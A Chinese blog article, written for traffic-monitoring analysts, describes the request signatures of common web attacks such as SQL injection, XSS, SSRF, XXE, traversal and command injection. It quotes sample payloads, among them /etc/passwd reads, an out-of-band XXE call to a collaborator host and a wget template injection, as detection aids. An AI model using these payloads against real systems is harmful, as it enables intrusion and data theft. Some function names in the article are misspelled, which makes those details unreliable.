常見漏洞的流量特征

?

1、SQL注入漏洞

?查看url / Referer字段/User-Agent字段/cookie字段

  1. 出現一些特殊字符(eg:單引號【‘】、雙引號【“”】、括號【()】、單引號括號【‘(】、雙引號括號【“(】等一些常見的特殊的字符);

??????eg:http://localhost/index.php/?id=1'and+1=1--+

eg:http://localhost/index.php/?id=1 and 1=1 -- -和1 and 1=2 --+

?

  1. 出現SQL命令/語句(增加、刪除、修改、查詢語句或者各語句之間的串接)

eg:url/?id=1" ?and ?updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) -- -

eg:url/?id=-1' union select?1,group_concat(schema_name),3 from ?information_schema.schemata?--+

?

  1. 出現注釋符號(在語句的最后出現連續2個減號字元 -- 后的 ?? 文字為注解,或“/*”與“*/”所包起來的文字為注解)

?

  1. 在url上出現萬能密碼字段 ?'or'1'='1

?

  1. 出現常見的特殊函數

? database()、updatexml()、extractvalue()、group_concat()、concat()、limit()、order by()、unsion()、system_user()、version()、load_file()、seelp()、length()、exp()、group by()、substr()、and、or等函數。

?

eg:?id=1”?and updatexml(1,concat(0x7e,database()),3) --+

eg:?id=-1’ union?select 1,2,seelp(5)--+

eg:1” union select updatexml(1,concat(0x7e,(select ????group_concat(username) from users)),1) #

  1. 出現各種編碼(eg:url編碼,base64編碼等)可利用Burp或 者在線解/編碼器進行操作查看是否有特殊字段。
  2. user-agent字段出現sqlmap/1.0.8.15#dev (http://sqlmap.org)

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps1.jpg&pos_id=rbZyoezU

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps2.jpg&pos_id=2MWezksu

1.1 DNSlog注入

Load_file函數,功能是讀取文件并返回文件內容為字符串。(訪問互聯網中的文件時,需要在最前面加上兩個斜杠 //)

使用本函數有幾個前提:
1、首先要有注入點
2、需要有root權限
3、數據庫有讀寫權限即:secure_file_priv=“”
4、得有請求url權限
5、還必須得是windows服務器

?

concat函數

2、XSS(跨站腳本攻擊)漏洞

查看url / Referer字段/User-Agent字段/cookie字段

查看是否出現以下各種標簽(但不限于以下標簽)

  1. 查看是否出現script標簽<script>alert(1);</script>
  2. 查看是否出現img標簽<img src=1 οnerrοr=alert(1);>
  3. 查看是否出現input標簽<input οnfοcus=alert(1);>
  4. 查看是否出現svg 標簽<svg οnlοad=alert(1);>
  5. 查看是否出現select?標簽<select οnfοcus=alert(1)></select>
  6. 查看是否出現iframe 標簽<iframe οnlοad=alert(1);></iframe>

?例如:

GET:/CuteSoft_Client/'"()&%<ScRiPt >prompt(994848)</ScRiPt>/SpellCheck.aspx HTTP/1.1 ?

Referer: http://emp.bcu.edu.cn/

GET /error_page.htm?flag='+alert('XSS')+' HTTP/1.1

<style type="text/javascript">alert('xss');</style>

<style>@import'javascript:alert("xss")';</style>

<link rel="stylesheet" href="http://ha.ckers.org/xss.css"> ?

  1. 這些標簽里是否有一些危險函數【eval()函數、system()函數等】 ???或者直接出現這寫標簽后分析里面的語句看他要獲取哪些信息。
  2. 若以上標簽里的內容出現各種類型的編碼、雙寫/大小寫標簽、各種特殊字符進行過濾都要著重看。
  3. user-agent字段出現 : ??? '%22()%26%25<ScRiPt%20>prompt(961668)</ScRiPt>

告警相關示例:

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps3.jpg&pos_id=6s5Pn9Ge

url ??%0D%0A%3C%2Ftte%3E%3Cscript%3Ea ert%28myhd%29%3B%3C%2Fscpt%3E8au

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps4.jpg&pos_id=PlQ6Dnov

url解密出來的函數是惡意函數aert()以及script標簽來獲取賬號

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps5.jpg&pos_id=c4gVwlWD

3、CSRF(跨站請求偽造)漏洞

查看Referer字段,正常來說,Referer字段應和請求的地址位于同一域名下。而如果是CSRF攻擊傳來的請求,Referer字段會是包含惡意網址的地址,不會在同一個域名下,這時候服務器就能識別出惡意的訪問。所以在查看csrf告警時,看域名是否有相同的后綴,是否是來自本站

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps6.jpg&pos_id=cSVcnu1C

4、SSRF(服務器端請求偽造)漏洞

  1. 查看url上是否有file協議/gopher協議/ftp協議/dict協議

例 ?http://127.0.0.1/pikachu/vul/ssrf/ssrf_curl.php?url=file:///c:/windows/system.ini(獲取本地c盤的system.ini文件)

  1. (查看url地址后面一些參數(share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain等)這些參數后面的值是不是內網的IP地址或者是127.0.0.1或者是一些協議的一些關鍵字眼。
  2. 這些參數值的后面是否有特殊字符(繞過ssrf會使用一些特殊字符eg:‘。’‘[: :]’等一些特殊的字符),也可能出現各種編碼/進制進行寫IP地址,或者特殊的域名eg:xip.io。
  3. 是否出現file_get_contents()、fsockopen()、curl_exec()等函數

5、XXE(外部實體注入)漏洞

  1. 若攻擊報文出現一下告警,大概率是誤報,因為這個是電信的L1接口定位采用的是xml格式的報文,所以會產生告警

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps7.jpg&pos_id=1jJjzx73

  1. 若報文中的system后面出現了url,要著重注意,(因為外部實體的聲明使用SYSTEM關鍵字,并且必須指定一個URL,從該URL可以加載實體的值。)

例如:

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" >?]>

?

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" >?]>

?

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "php://filter://path/to/file" ]>

?

???<!ENTITY lyq SYSTEM "file:///etc/passwd">

?

著重看以下3個協議

·data://協議 ???

·file://協議加文件上傳 ???

·php://filter協議加文件上傳

?

?

參考Content-Type字段的值,

告警示例:

GET /meol/manage/web.config.bak HTTP/1.1

Content-Type:?text/xml;charset=utf-8

Accept字段

告警示例:

GET /meol/manage/web.config.bak HTTP/1.1

Accept=application/xml,text/xml,*/*;q=0.01

X-Requested-With字段

告警示例:

GET /meol/manage/web.config.bak HTTP/1.1

X-Requested-With:XMLHttpRequest

結合告警中是否有xml的payload,一般在告警最下面顯示。

?

payload示例:

<?xml version="1.0"?>

<!DOCTYPE ANY [

????<!ENTITY % d SYSTEM

???"http://t606r6jh3sa4nrjus0ks29kwbnhe53.burpcollaborator.net">%d;

?????]>

<a>&xxe;</a>

總結:出現xml的文件或者后綴都著重看一下。

6、資源盜鏈漏洞

通過查看Referer字段或者簽名,是否有外來網站,來源不是本站,只能通過Referer字段來進行判斷,看是否有新的外來地址。著重看以http和https開頭的網址。

7、目錄遍歷

?? 如果url上有大量的../../../../../../關鍵字符就有可能攻擊者利用目錄遍歷來攻擊,也要結合../后面是什么目錄,若是敏感目錄或者文件(例如:/etc/passwd、php后綴、conf后綴等)就要著重看一下,或者url上是各種編碼,要進行解碼進行查看內容

目錄遍歷漏洞的特征要注意:

?page=xxx.php ??index=xxx.jsp?????home=xxx.html ???file=content??????最終也要結合響應包進行最終確認是否攻擊成功,是否響應。

告警示例:

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps8.jpg&pos_id=N4lz64mL

通過UTF-8解碼之后再進行url解碼得出

ba.online.sh.cn/../../../../../../../../../../../../../../../../../../../../etc/passwd

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps9.jpg&pos_id=mXjF70YX

8、命令執行注入

  1. 如果請求體或者url里出現以下危險函數

??【1】 php代碼

system()、exec()、shell_exec()、passthru函數

popen函數 ?eval函數 assert()

【2】JSP代碼

Runtime run = Runtime.getRuntime(); run.exec("ipconfig");

【3】ASP代碼

<%Response.writeCreateObject("wscript.shell").exec("cmd.exe /c ???ipconfig").StdOut.ReadAll%>

  1. 若里面還有特殊字符(|,||,&,&&,反符號` `,>,>>,< ,<<)
  2. 出現系統命令、系統目錄、敏感文件等

相關告警示例:

GET /simple/tests/tmssql.php?do=phpinfo

GET /detail.php?id=/winnt/system32/cmd.exe?/c+dir+c:%5c

GET /cgi/maker/ptcmd.cgi?cmd=;cat+/tmp/config/usr.ini

GET /cgi/maker/ptcmd.cgi?cmd=;cat+/etc/passwd

8.1 freemaker模版注入

deviceUdid=${"freemarker.template.utility.Execute"?new()("wget http://downlo%6

<#assign test="freemarker.template.utility.Execute"?new()> ${test("open /Applications/Calculator.app")}

error=&deviceUdid=${"freemarker.template.utility.Exe%6

8.2 ?WinRAR遠程代碼執行漏洞分析

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps10.jpg&pos_id=mfPF2YK7

如果把響應代碼更改為“301 Moved Permanently”,所有請求都將轉到惡意域“attacker.com”,并且惡意域“attacker.com”會被緩存下來。緩存下來以后,所有到默認域“notifier.rarlab.com”的流量會重定向到惡意域“attacker.com”。

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps11.jpg&pos_id=Z5McbM8K

9、LDAP注入

定義

LDAP輕量級目錄訪問協議,是一種在線目錄訪問協議,主要用于目錄中資源的搜索和查詢。

如果出現一些運算符(=、|、||、&、&&、!(非)、*(通配符)等),因為這些運算符都是LDAP的基本語法。

例如:

ldap://austin.ibm.com/ou=Austin,o=IBM

ldap:///ou=Austin,o=IBM??sub?(cn=Joe Q. Public)

LDAP注入攻擊面

(&(parameter1=value1)(parameter2=value2))

value1和value2可以換成注入代碼

?

10、文件包含漏洞

文件包含會出現4個函數:

include()???include_once()???require()??require_once()

出現4個函數后結合響應體著重看一下

url也會出現特殊字符../../等特殊字符

一般文件包含和文件上傳會結合使用。

11、文件上傳漏洞

http 請求 Header 頭部中的 Content-Type 存在以下特征:

multipart/form-data:表示該請求是一個文件上傳請求

存在 boundary 字符串

POST 的內容存在以下特征: Content-Disposition name filename

?

查看文件的后綴是以.php ?.php1~5 ?php的大小寫或者.asp、.asp的大小寫混合,或者以.htaccess結尾的,還有圖片馬要著重注意

?

12、信息泄露

配置文件訪問

httpd.conf htaccess HTPASSWD boot.ini etc/passwd

Php.ini Web.xml等后綴文件,然后結合響應體查看是否響應

?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/712578.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/712578.shtml
英文地址,請注明出處:http://en.pswp.cn/news/712578.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

數通HCIE和云計算HCIE哪個好一點?

數通是網絡的基礎知識&#xff0c;也是入門人員必學的方向&#xff0c;相對也會簡單些&#xff0c;學習數通&#xff0c;可以很好的學習其他的方向。數通的就業范圍也比較廣&#xff0c;運營商、企業、政府還是互聯網公司&#xff0c;都需要大量的數通工程師來搭建和維護網絡&a…

探索rsync遠程同步和SSH免密登錄的奧秘

目錄 集群分發腳本xsyncscp&#xff08;secure copy&#xff09;安全拷貝rsync 遠程同步工具集群分發腳本 SSH免密登錄免密登錄原理SSH免密登錄配置生成公鑰和私鑰授權測試 在現代科技飛速發展的時代&#xff0c;數據的備份和遷移成為了一個重要的課題。其中&#xff0c;rsync遠…

大數據畢業設計之前端04:管理系統為什么要自己實現圖標組件

關鍵字&#xff1a;BuildAdmin、Icon、圖標、Vue、ElementUI 前言 說到圖標&#xff0c;在BuildAdmin中用到的地方很多。比如上一篇中的折疊圖標&#xff0c;還有菜單欄圖標、導航菜單欄圖標等。常見的圖標有&#xff1a;ElementUI圖標、font-awesome、iconfont阿里圖標以及本…

94. 遞歸實現排列型枚舉 刷題筆記

思路 依次枚舉 每個位置用哪個數字 要求按照字典序最小來輸出 而每次搜索下一層時i都是從1開始 也就是說 如果有小的數可以填上 那么該方案會填上這個數字 例如 當n等于3 第一次搜索 1 2 3輸出后返回 返回后此時i3 第二個位置填3 1 3 2 輸出后返回 此時返回到第一層…

云計算 2月21號 (linux文件及用戶管理)

一、文件管理 1.1快捷鍵 編輯命令&#xff1a; Ctrl a &#xff1a;移到命令行首 Ctrl e &#xff1a;移到命令行尾 Ctrl u &#xff1a;從光標處刪除至命令行首 Ctrl k &#xff1a;從光標處刪除至命令行尾 Ctrl w &#xff1a;從光標處刪除至字首 Ctrl d &#x…

20240301-2-ZooKeeper面試題(二)

11. Chroot 特性 3.2.0 版本后&#xff0c;添加了 Chroot 特性&#xff0c;該特性允許每個客戶端為自己設置一個命名空間。如果一個客戶端設置了 Chroot&#xff0c;那么該客戶端對服務器的任何操作&#xff0c;都將會被限制在其自己的命名空間下。 通過設置 Chroot&#xff…

Win11遠程桌面登陸教程

必備軟件 Remote Desktop 這個軟件用于便捷操作 Tailscale 這個用于創建虛擬局域網讓兩臺設備處于同一個網段便于遠程連接 詳細步驟 0、打開電腦設置允許遠程連接模式 把這里的開關打開就行。 1、設置允許登陸的用戶以及密碼 在管理員模式下的宿主電腦上面輸入以下命令…

支付寶小程序中喚起支付(前后端)

Java后臺獲取支付寶支付唯一訂單號 /*** 支付寶小程序支付*/PostMapping(value "/xcxPayZFBTHREE")ResponseBodypublic Map<String,Object> xcxPayZFBTHREE(RequestBody byte[] req) {HashMap<String, Object> objectObjectMap new HashMap<>();…

jax可微分編程的筆記(7)

jax可微分編程的筆記(7) 第七章 優化算法 從優化理論的整體框架來看&#xff0c;任何優化問題都可以被分解為 模型的建立&#xff0c;損失函數的構造以及優化算法的選取這三個部分。 其中優化算法的具體形式&#xff0c;又依賴于步長下降方向和終止條件 的選取。 對于多維函…

JavaScript 瀏覽器元素滾動 scrollIntoView()

scrollIntoView() ? DOM 規范中沒有涉及的一個問題是如何滾動頁面中的某個區域。為填充這方面的缺失&#xff0c;不同瀏覽器實現了不同的控制滾動的方式。在所有這些專有方法中&#xff0c;HTML5 選擇了標準化 scrollIntoView()。 ? scrollIntoView() 方法存在于所有 HTML …

深度學習中常見的backbone、neck、head的理解

在深度學習中&#xff0c;常見的backbone、neck和head是指網絡結構的不同部分&#xff0c;它們各自承擔著不同的功能&#xff1a; Backbone&#xff08;骨干網絡&#xff09;&#xff1a;骨干網絡通常是指整個深度神經網絡的主要部分&#xff0c;負責提取輸入數據的特征。骨干網…

寒假作業Day 02

這是第二天的作業&#xff0c;fighting&#xff01; Day 02 一、選擇題 首先char* s[6]是指針數組&#xff0c;也就是其存儲的都是這些字符串的地址&#xff0c;其實際上的類型為char**&#xff0c;而fun函數傳入了s數組的首地址。而后續fun函數中打印字符&#xff0c;p[i]即…

ad18學習筆記十六:如何放置精準焊盤到特定位置,捕抓功能的講解

網上倒是一堆相關的指導 AD軟件熟練度提升&#xff0c;如何設置板框捕捉&#xff1f;_嗶哩嗶哩_bilibili 關于Altium Designer 20 的捕抓功能的講解_ad捕捉設置-CSDN博客 AD軟件捕捉進階實例&#xff0c;如何精確的放置布局元器件&#xff1f;_嗶哩嗶哩_bilibili AD繪制PCB…

項目-SERVER模塊-Socket模塊

Socket模塊 一、Socket模塊是什么&#xff1f;二、代碼實現1.成員變量2.構造、析構函數3.獲取套接字文件描述符4.創建套接字5.綁定地址信息6.開始監聽連接請求7.向服務器發起連接8.獲取新連接9.接收數據10.非阻塞接收數據11.發送數據12.非阻塞發送數據13.關閉套接字14.創建一個…

何時使用子查詢?一個使用子查詢的SQL示例及其工作原理

何時使用子查詢&#xff1f;給出一個使用子查詢的SQL示例&#xff0c;并解釋其工作原理。 子查詢&#xff0c;也稱為內部查詢或嵌套查詢&#xff0c;是嵌入在另一個SQL查詢中的查詢。外部查詢&#xff0c;有時稱為外部查詢或主查詢&#xff0c;是包含子查詢的查詢。子查詢可以…

20240301作業

1.使用fwrite、fread將一張隨意的bmp圖片&#xff0c;修改成德國的國旗 #include <stdio.h> #include <string.h> #include <unistd.h> #include <stdlib.h> int main(int argc, const char *argv[]) {FILE* fp fopen("./gaoda.bmp","…

24.3.1 《CLR via C#》 筆記9

第十二章 泛型 泛型&#xff1a;支持泛型值類型、泛型引用類型、泛型接口、泛型委托&#xff1b;允許在引用類型、值類型和接口中定義泛型方法&#xff1b;泛型參數變量要么稱為T&#xff0c;要么以T開頭 具有泛型類型參數的類型稱為開放類型&#xff0c;不允許構造實例&#…

Java畢業設計 基于SpringBoot vue 社區團購系統

Java畢業設計 基于SpringBoot vue 社區團購系統 SpringBoot vue 社區團購系統 功能介紹 前端用戶: 首頁 圖片輪播 商品信息 商品分類展示 搜索 商品詳情 點我收藏 添加到購物車 立即購買 我要開團 去參團 評論 公告資訊 資訊詳情 登錄 注冊 個人中心 更新信息 點我充值 我的訂…

Mysql筆記3

1、快速創建表 原理&#xff1a; 將一個查詢結果當做一張表新建 這個可以完成表的快速復制 create table emp2 as select * from emp; mysql> select * from emp2; ---------------------------------------------------------------------- …

【vscode提取函數快捷鍵】提取函數,減少大方法的復雜度

在 Visual Studio Code 中&#xff0c;提取函數的快捷鍵取決于你所使用的編程語言和安裝的插件。以下是一些常用的快捷鍵組合&#xff0c;可以用來在 Visual Studio Code 中提取函數&#xff1a; 執行以下步驟來提取函數&#xff1a; 選中要提取的代碼塊。右鍵單擊選中的代碼…